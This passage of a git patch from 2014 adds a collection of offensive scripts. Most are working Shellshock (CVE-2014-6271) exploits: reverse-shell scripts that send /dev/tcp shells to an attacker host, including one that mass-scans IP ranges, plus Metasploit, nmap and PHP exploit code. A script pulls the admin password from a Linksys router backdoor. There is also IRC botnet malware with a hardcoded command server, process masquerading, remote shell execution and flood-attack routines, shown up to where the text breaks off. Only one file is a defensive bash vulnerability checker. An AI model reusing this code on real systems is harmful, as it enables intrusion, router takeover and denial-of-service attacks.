From 9df63fa0ec77a5a4af0862ac7cde6ad924f0abbb Mon Sep 17 00:00:00 2001
From: Mari Wahl <mari.wahl9@gmail.com>
Date: Wed, 1 Oct 2014 14:40:43 -0400
Subject: [PATCH] some small fixes

---
 802.11 /crack_linksys.py                      |  29 +
 .../ShellShocker/scripts/bashshock_check.sh   |  37 ++
 .../scripts/cgi-bin-reverse-shell.py          |  21 +
 OS_Injections/ShellShocker/scripts/check.py   |  68 +++
 .../ShellShocker/scripts/dhclient_bash_env.rb |  84 +++
 .../ShellShocker/scripts/exploit.nse          | 119 ++++
 .../ShellShocker/scripts/exploit.php          |  47 ++
 OS_Injections/ShellShocker/scripts/paylod.pl  | 527 ++++++++++++++++++
 .../ShellShocker/scripts/paylod_2.pl          | 107 ++++
 .../ShellShocker/scripts/shellshock_nuke.sh   | 106 ++++
 OS_Injections/ShellShocker/shellshocker-pocs  |   1 +
 11 files changed, 1146 insertions(+)
 create mode 100644 802.11 /crack_linksys.py
 create mode 100755 OS_Injections/ShellShocker/scripts/bashshock_check.sh
 create mode 100644 OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py
 create mode 100644 OS_Injections/ShellShocker/scripts/check.py
 create mode 100644 OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb
 create mode 100644 OS_Injections/ShellShocker/scripts/exploit.nse
 create mode 100644 OS_Injections/ShellShocker/scripts/exploit.php
 create mode 100644 OS_Injections/ShellShocker/scripts/paylod.pl
 create mode 100644 OS_Injections/ShellShocker/scripts/paylod_2.pl
 create mode 100644 OS_Injections/ShellShocker/scripts/shellshock_nuke.sh
 create mode 160000 OS_Injections/ShellShocker/shellshocker-pocs

diff --git a/802.11 /crack_linksys.py b/802.11 /crack_linksys.py
new file mode 100644
index 0000000..9305567
--- /dev/null
+++ b/802.11 /crack_linksys.py	
@@ -0,0 +1,29 @@
+import socket
+import struct
+import sys
+
+#HOST = '192.168.1.1'
+HOST = '192.168.33.1'
+PORT = 32764
+
+def send_message(s, message, payload=''):
+    header = struct.pack('<III', 0x53634D4D, message, len(payload))
+    s.send(header+payload)
+    response = s.recv(0xC)
+    if len(response) != 12:
+        print("Device is not a crackable Linksys router.")
+        print("Recieved invalid response: %s" % response)
+        raise sys.exit(1)
+    sig, ret_val, ret_len = struct.unpack('<III', response)
+    assert(sig == 0x53634D4D)
+    if ret_val != 0:
+        return ret_val, "ERROR"
+    ret_str = ""
+    while len(ret_str) < ret_len:
+        ret_str += s.recv(ret_len-len(ret_str))
+    return ret_val, ret_str
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((HOST, PORT))
+send_message(s, 3, "wlan_mgr_enable=1")
+print send_message(s, 2, "http_password")
diff --git a/OS_Injections/ShellShocker/scripts/bashshock_check.sh b/OS_Injections/ShellShocker/scripts/bashshock_check.sh
new file mode 100755
index 0000000..d2d0ab3
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/bashshock_check.sh
@@ -0,0 +1,37 @@
+#!/bin/bash
+
+r=`x="() { :; }; echo x" bash -c ""`
+if [ -n "$r" ]; then
+	echo -e '\033[91mVulnerable to CVE-2014-6271 (original shellshock)\033[39m'
+else
+	echo -e '\033[92mNot vulnerable to CVE-2014-6271 (original shellshock)\033[39m'
+fi
+
+cd /tmp;rm echo 2>/dev/null
+X='() { function a a>\' bash -c echo 2>/dev/null > /dev/null
+if [ -e echo ]; then
+	echo -e "\033[91mVulnerable to CVE-2014-7169 (taviso bug)\033[39m"
+else
+	echo -e "\033[92mNot vulnerable to CVE-2014-7169 (taviso bug)\033[39m"
+fi
+
+bash -c "true $(printf '<<EOF %.0s' {1..16})" 2>/dev/null
+if [ $? != 0 ]; then
+	echo -e "\033[91mVulnerable to CVE-2014-7186 (redir_stack bug)\033[39m"
+else
+	echo -e "\033[92mNot vulnerable to CVE-2014-7186 (redir_stack bug)\033[39m"
+fi
+
+bash -c "`for i in {1..200}; do echo -n "for x$i in; do :;"; done; for i in {1..200}; do echo -n "done;";done`" 2>/dev/null
+if [ $? != 0 ]; then
+	echo -e "\033[91mVulnerable to CVE-2014-7187 (nested loops off by one)\033[39m"
+else
+	echo -e "\033[96mTest for CVE-2014-7187 not reliable without address sanitizer\033[39m"
+fi
+
+r=`a="() { echo x;}" bash -c a 2>/dev/null`
+if [ -n "$r" ]; then
+	echo -e "\033[93mVariable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug)\033[39m"
+else
+	echo -e "\033[92mVariable function parser inactive, likely safe from unknown parser bugs\033[39m"
+fi
diff --git a/OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py b/OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py
new file mode 100644
index 0000000..546f1f0
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py
@@ -0,0 +1,21 @@
+#
+#CVE-2014-6271 cgi-bin reverse shell
+#
+
+import httplib,urllib,sys
+
+if (len(sys.argv)<4):
+	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
+	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
+	exit(0)
+
+conn = httplib.HTTPConnection(sys.argv[1])
+reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
+
+headers = {"Content-type": "application/x-www-form-urlencoded",
+	"test":reverse_shell }
+conn.request("GET",sys.argv[2],headers=headers)
+res = conn.getresponse()
+print res.status, res.reason
+data = res.read()
+print data
\ No newline at end of file
diff --git a/OS_Injections/ShellShocker/scripts/check.py b/OS_Injections/ShellShocker/scripts/check.py
new file mode 100644
index 0000000..e4f0a8a
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/check.py
@@ -0,0 +1,68 @@
+We are...
+                      _____                         _________              
+                     /  _  \   ____   ____   ____  /   _____/ ____   ____  
+                    /  /_\  \ /    \ /  _ \ /    \ \_____  \_/ __ \_/ ___\
+                   /    |    \   |  (  <_> )   |  \/        \  ___/\  \___
+                   \____|__  /___|  /\____/|___|  /_______  /\___  >\___  >
+                           \/     \/            \/        \/     \/     \/
+                                    //Laughing at your security since 2012*
+=================================================================================================
+Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult
+                         - Gh05tFr3ak - xCyb3r 3vil7 -  Hassouna Khalil - spider64
+=================================================================================================
+
+# \!/ Enter your No-Ip address or other listening address in line 57 \!/  
+#       \!/  Launch   nc -l 31337   before executing script!  \!/
+# Dont forgets to update bash so you donts get PWNed while "testing"... lol
+# yum -y update bash; apt-get -y update bash; reboot
+# (Script is coded in python2.7, errors running with python3.0) 
+
+import httplib,urllib
+
+print "###########################################################"
+print "###                  ShellShock.py                      ###"       
+print "###       Bash 0-day Environment Variable Injector      ###"
+print "###                  CVE-2014-6271                      ###"
+print "### *************************************************** ###"
+print "###                                                     ###"
+print "###          It's either shell or be shelled            ###"                      
+print "###                                                     ###"
+print "###                    _.-''|''-._                      ###"
+print "###                 .-'     |     `-.                   ###"
+print "###               .'\       |       /`.                 ###"
+print "###             .'   \      |      /   `.               ###"
+print "###             \     \     |     /     /               ###"
+print "###              `\    \    |    /    /'                ###"
+print "###                `\   \   |   /   /'                  ###"
+print "###                  `\  \  |  /  /'                    ###"
+print "###                 _.-`\ \ | / /'-._                   ###"
+print "###                {_____`\\|//'______}                  ###"
+print "###                        `-'                          ###"
+print "###                                                     ###"
+print "### twitter.com/_d3f4ult                                ###"
+print "###########################################################"
+print "\n"     
+print '\t\!/ Reverse shell returned on port 31337 \!/\n'
+print '\t  Enter The First Three IP ranges To Scan \n'     
+url = raw_input("          [Example : 123.456.789] : ")
+finput = input("Enter the Starting IP of Range to Scan  : ")
+sinput = input("Enter the Ending IP of Range to Scan for : ")
+print
+     
+path = raw_input("Enter Vuln CGI Path : ")
+     
+for x in range(finput,sinput + 1):
+         murl = url + "." + str(x)
+         conn = httplib.HTTPConnection(murl)
+         reverse_shell='() { :; }; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1'
+         headers = {"Content-type": "application/x-www-form-urlencoded",
+         "test": reverse_shell}
+         conn.request("GET",path,headers=headers)
+         res = conn.getresponse()
+     
+         if str(res.status) == '200':
+                  print "[+] Website Present and Payload Successfully Sent To " + murl + path
+                  data = res.read()
+                  print data
+         else:
+                  print "[!]" + murl + path + " Is Not Vulnerable."
\ No newline at end of file
diff --git a/OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb b/OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb
new file mode 100644
index 0000000..2472f24
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/dhcp'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::DHCPServer
+
+  def initialize
+    super(
+      'Name'        => 'DHCP Client Bash Environment Variable Code Injection',
+      'Description'    => %q{
+        This module exploits a code injection in specially crafted environment
+        variables in Bash, specifically targeting dhclient network configuration
+        scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
+      },
+      'Author'      =>
+        [
+          'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module
+          'Stephane Chazelas', # Vulnerability discovery
+          'Ramon de C Valle' # This module
+        ],
+      'License' => MSF_LICENSE,
+      'Actions'     =>
+        [
+          [ 'Service' ]
+        ],
+      'PassiveActions' =>
+        [
+          'Service'
+        ],
+      'DefaultAction'  => 'Service',
+      'References' => [
+        ['CVE', '2014-6271'],
+        ['CWE', '94'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
+        ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
+        ['URL', 'http://seclists.org/oss-sec/2014/q3/649',],
+        ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]
+      ],
+      'DisclosureDate' => 'Sep 24 2014'
+    )
+
+    register_options(
+      [
+        OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
+      ], self.class)
+
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+  end
+
+  def run
+    value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
+
+    hash = datastore.copy
+    hash['DOMAINNAME'] = value
+    hash['HOSTNAME'] = value
+    hash['URL'] = value
+
+    # This loop is required because the current DHCP Server exits after the
+    # first interaction.
+    loop do
+      begin
+        start_service(hash)
+
+        while @dhcp.thread.alive?
+          select(nil, nil, nil, 2)
+        end
+
+      rescue Interrupt
+        break
+
+      ensure
+        stop_service
+      end
+    end
+  end
+
+end
diff --git a/OS_Injections/ShellShocker/scripts/exploit.nse b/OS_Injections/ShellShocker/scripts/exploit.nse
new file mode 100644
index 0000000..670715c
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/exploit.nse
@@ -0,0 +1,119 @@
+description = [[
+Attempts to exploit the vulnerability known as "shellshock" against web applications via HTTP headers. By default it simply echoes back a random string but other commands may be injected. 
+
+To detect this vulnerability the script executes a command that prints a random string and then looks for it inside the page's body.   
+
+Vulnerability originally discovered by Stephane Chazelas.
+
+References:
+* http://www.openwall.com/lists/oss-security/2014/09/24/10
+* http://seclists.org/oss-sec/2014/q3/685
+* 
+]]
+
+-- @usage 
+-- nmap -sV -p- --script http-shellshock <target>
+-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
+-- @output
+-- PORT   STATE SERVICE REASON
+-- 80/tcp open  http    syn-ack
+-- | http-shellshock: 
+-- |   VULNERABLE:
+-- |   HTTP Shellshock vulnerability
+-- |     State: VULNERABLE (Exploitable)
+-- |     IDs:  CVE:CVE-2014-6271
+-- |       This web application might be affected by the vulnerability known as Shellshock. It seems the server 
+-- |       is executing commands injected via malicious HTTP headers. 
+-- |             
+-- |     Disclosure date: 2014-09-24
+-- |     References:
+-- |       http://www.openwall.com/lists/oss-security/2014/09/24/10
+-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
+-- |       http://seclists.org/oss-sec/2014/q3/685
+-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
+--
+-- @xmloutput
+-- <elem key="title">HTTP Shellshock vulnerability</elem>
+-- <elem key="state">VULNERABLE (Exploitable)</elem>
+-- <table key="ids">
+-- <elem>CVE:CVE-2014-6271</elem>
+-- </table>
+-- <table key="description">
+-- <elem>This web application might be affected by the vulnerability known as Shellshock. It seems the server &#xa;is executing commands injected via malicious HTTP headers. &#xa;      </elem>
+-- </table>
+-- <table key="dates">
+-- <table key="disclosure">
+-- <elem key="year">2014</elem>
+-- <elem key="day">24</elem>
+-- <elem key="month">09</elem>
+-- </table>
+-- </table>
+-- <elem key="disclosure">2014-09-24</elem>
+-- <table key="refs">
+-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</elem>
+-- <elem>http://www.openwall.com/lists/oss-security/2014/09/24/10</elem>
+-- <elem>http://seclists.org/oss-sec/2014/q3/685</elem>
+-- <elem>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</elem>
+-- </table>
+-- @args http-shellshock.uri URI. Default: /
+-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent
+-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil
+---
+author = {"Paulino Calderon <calderon()websec.mx","Paul Amar <paul()sensepost com>"}
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln","intrusive"}
+
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local vulns = require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
+  local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or "User-Agent"
+  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
+
+  local rnd = stdnse.generate_random_string(15)
+  local payload = '() { :;}; echo; echo "'..rnd..'"'
+  if cmd ~= nil then
+    cmd = '() { :;}; '..cmd
+  end
+  -- Plant the payload in the HTTP headers
+  local options = {header={}}
+  options["no_cache"] = true
+  options["header"][http_header] = payload
+
+  stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", payload, http_header))
+  local req = http.get(host, port, uri, options)
+  if req.status == 200 and string.match(req.body, rnd) ~= nil then
+    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+    local vuln = {
+      title = 'HTTP Shellshock vulnerability',
+      state = vulns.STATE.NOT_VULN, 
+      description = [[
+This web application might be affected by the vulnerability known as Shellshock. It seems the server 
+is executing commands injected via malicious HTTP headers. 
+      ]],
+      IDS = {CVE = 'CVE-2014-6271'},
+      references = {
+        'http://www.openwall.com/lists/oss-security/2014/09/24/10',
+        'http://seclists.org/oss-sec/2014/q3/685',
+        'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169'
+      },
+      dates = {
+        disclosure = {year = '2014', month = '09', day = '24'},
+      },
+    }
+    stdnse.debug(1, string.format("Random pattern '%s' was found in page. Host seems vulnerable.", rnd))
+    vuln.state = vulns.STATE.EXPLOIT
+    if cmd ~= nil then
+       options["header"][http_header] = cmd
+       stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", cmd, http_header))
+       req = http.get(host, port, uri, options)
+       vuln.exploit_results = req.body
+    end
+    return vuln_report:make_output(vuln)
+  end
+end
diff --git a/OS_Injections/ShellShocker/scripts/exploit.php b/OS_Injections/ShellShocker/scripts/exploit.php
new file mode 100644
index 0000000..3c0f5c0
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/exploit.php
@@ -0,0 +1,47 @@
+<?php
+/*
+Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
+CVE: 2014-6271
+Vendor Homepage: https://www.gnu.org/software/bash/
+Author: Prakhar Prasad && Subho Halder
+Author Homepage: https://prakharprasad.com && https://appknox.com
+Date: September 25th 2014
+Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
+	   GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
+Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
+	   Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
+Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
+
+Test CGI Code : #!/bin/bash
+				echo "Content-type: text/html"
+				echo ""
+				echo "Bash-is-Vulnerable"
+
+*/
+error_reporting(0);
+if(!defined('STDIN')) die("Please run it through command-line!\n");
+$x  = getopt("u:c:");
+if(!isset($x['u']) || !isset($x['c']))
+{
+	die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
+
+}
+$url = $x['u'];
+$cmd = $x['c'];
+
+$context = stream_context_create(
+	array(
+		'http' => array(
+			'method'  => 'GET',
+			'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
+		)
+	)
+);
+$req = file_get_contents($url, false, $context);
+if(!$req && strpos($http_response_header[0],"500") > 0 )
+	die("Command sent to the server!\n");
+else if($req && !strpos($http_response_header[0],"500") > 0)
+	die("Server didn't respond as it should!\n");
+else if(!$req && $http_response_header == NULL)
+	die("A connection error occurred!\n")
+?>
diff --git a/OS_Injections/ShellShocker/scripts/paylod.pl b/OS_Injections/ShellShocker/scripts/paylod.pl
new file mode 100644
index 0000000..e517963
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/paylod.pl
@@ -0,0 +1,527 @@
+#!/usr/bin/perl
+# this spreader is coded by xdh
+# xdh@xxxxxxxxxxx
+# only for testing...
+
+my @nickname = ("|PHP|");
+
+my $nick = $nickname[rand scalar @nickname];
+
+my $ircname = $nickname[rand scalar @nickname];
+
+
+#system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`");
+my $processo = '/usr/sbin/atd';
+
+
+# funny world...
+
+my $linas_max='6';
+my $sleep='5';
+my @adms=("JB","x");
+my @hostauth=("fuckoff","localhost");
+my @canais=("#new");
+chop (my $realname = 'vn');
+$servidor='185.31.209.84' unless $servidor;
+my $porta='443';
+my $VERSAO = 'BUCEFALO';
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/tmp");
+#$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sendraw("PASS swedenrocks");
+     sleep 1;
+   }
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
+       }
+       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+        }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal ddosit");
+       }
+   }
+}
+
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my 
+@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
+             my (@aberta, %porta_banner);
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");     
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout 
+=> 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
+             } else {
+               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); 
+             }
+           }
+           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
+             my $itime = time;
+             my ($cur_time);
+             $cur_time = time - $itime;
+             while ($3>$cur_time){
+             $cur_time = time - $itime;
+             &tcpflooder("$1","$2","$3");
+             }
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
+           }
+           if ($funcarg =~ /^version/) {
+                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);               
+                }
+           if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1." 
+seconds.");
+             srand;
+             my $itime = time;
+             my ($cur_time);
+             my ($exploited);
+             $boturl=$2;
+             $cur_time = time - $itime;$exploited = 0;
+                while($1>$cur_time){
+                    $cur_time = time - $itime;
+                    @urls=fetch();
+                        foreach $url (@urls) {
+                        $cur_time = time - $itime;
+                        my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
+                        $url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
+                        $page = http_query($url);
+                        $exploited = $exploited + 1;
+                    }
+                }
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." 
+seconds.");
+           }
+           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
+             my $itime = time;
+             my ($cur_time);
+             $cur_time = time - $itime;
+             while ($2>$cur_time){
+             $cur_time = time - $itime;
+             my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+             close($socket);
+             }
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
+           }
+           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for 
+".$3." seconds.");
+             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent 
+".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+
+sub shell {
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "No such file or directory");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+sub tcpflooder {
+ my $itime = time;
+ my ($cur_time);
+ my ($ia,$pa,$proto,$j,$l,$t);
+ $ia=inet_aton($_[0]);
